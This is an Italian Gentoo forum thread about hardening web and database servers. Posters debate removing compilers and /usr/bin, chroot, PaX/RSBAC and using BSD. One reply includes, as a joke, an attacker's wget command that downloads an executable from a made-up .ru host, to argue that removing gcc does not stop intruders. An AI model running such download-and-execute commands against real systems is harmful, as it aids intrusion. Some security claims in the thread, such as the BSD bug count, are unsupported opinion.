come aumentare sicurezza macchine gentoo su web?

swit

Salve,
stavo pianificando di installare alcune macchine gentoo che fungereanno da web-server e DB server.
Oltre a installare il profilo hardened vorrei apportare altre piccole modifiche per rendere ancora più sicuro tutto il sistema.

Solitamente su un server web si cancella gcc (cc) e compilatori vari da riga di comando, interprete perl e php per la shell.
(per il php volendo si può scegliere di non installare la parte CLI)
Nel caso di gentoo sarebbe comodo rimuovere anche emerge e tutto l'albero degli ebuilds.

La cosa alla quale avevo pensato è, visto che userò 3/4 macchine identiche perchè non formattare una pen drive da un GB con 2 partizioni ext3, metterci /usr/portage e /usr/bin e poi cancellare questi due moutpoint dal filesystem?
Cancellati i dati interessati dal filesystem, una volta che avrò bisogno dei dati che sono nella pen disk, non farò altro che montarla nelle rispettive directory.

Penso che per /usr/portage non ci siano problemi, ma /usr/bin ci saranno problemi?

Spero che la cosa interessi a molti e di non aver sparato fesserie

Non so, se il titolo rende giustizia a questo thread; se qualcuno ne trovasse uno più congruo me lo segnali o se è moderatore lo cambi

.:deadhead:. · Posted: Thu May 11, 2006 9:21 am Post subject:

Io non son convinto che levar gcc sia un modo per aumentare la sicurezza :-D

Se ti bucano ti bucano, ti fidi di una macchina dopo che è stata violata? Ed oggettivamente quanto tempo impiega un attaccante a fare wget www.tispiezzoindue.ru/apriscatole.exe piuttosto che compilarselo?

Se non lo hai già letto, prova a dare una lettura alla fantasmagorica documentazione di gentoo a riguardo.

Inoltre, il profilo hardened è un buon inizio, ma visto che con gentoo l'installazione è facilitata, vuol dire che puoi concentrarti sulla parte fondamentale: la configurazione,perchè anche con il profilo hardened se qualcosa è configurato male ti aprono...
_________________
Proudly member of the Gentoo Documentation Project: the Italian Conspiracy !

makoomba · Bodhisattva Joined: 03 Jun 2004 Posts: 1856

.:chrome:.

come è già stato detto, quelle misure da te indicate sono poco efficaci, e poco sensate.
se ti sfondano la macchina il fatto saliente è ciò che è avvenuto, non il fatto che possano compilare campo minato con il tuo gcc. inoltre, con un sistema gentoo, togliere gcc significa non avere più nessuna possibilità di aggiornare il server, che ti espone a rischi veri e concreti.

le configurazioni in chroot sono una soluzione, una volta io le adottavo in massa. adesso mi sto orientando su altro. la chroot è spesso una grossa complicazione alla gestione e l'aggiornamento del server.

soluzioni tipo PaX + RSBAC ti mettono davvero al sicuro, però bisogna vedere anche se il gioco vale la candela

makoomba · Bodhisattva Joined: 03 Jun 2004 Posts: 1856

Ilvalle · Posted: Thu May 11, 2006 8:36 pm Post subject:

C'Ã¨ anche da dire, che se uno ti buca un demone in ascolto, ti buca anche il chroot,
dicono che quest'ultima sia una delle trap + bacata del kernel linux.
E' sempre qualcosa in +, ma non c'+ nessuna sicurezza concreta.

Se hai due macchine, puoi farle giocare insieme, se una viene bucata , la seconda
prende il posto della prima. Un semplice cluster di firewall (pentium2 son sufficienti).

Ultimo consiglio non usare gentoo, almeno non il kernel linux...(consiglio BSD)
valle

lavish · Bodhisattva Joined: 13 Sep 2004 Posts: 4296

Ilvalle · Posted: Thu May 11, 2006 9:44 pm Post subject:

si ok, opps

chiudo umilmente scusa,
Le potenzialita' in ambito di sicurezza del kernel che ho citato son indiscusse.non puoi essere che essere daccordo.
Motivazione: Negli ultimi 10 anni hanno avuto un solo bug di sicurezza. Linux ?
Questo e' il mio consiglio su questo argomento, una via di mezzo come hai detto tu "gentoo/fBSD" puo' essere un compromesso.

valle

.:chrome:. · Posted: Thu May 11, 2006 10:10 pm Post subject:

ProT-0-TypE · Veteran Joined: 20 Dec 2003 Posts: 1624 Location: Cagliari

X-Drum · Posted: Fri May 12, 2006 9:35 am Post subject: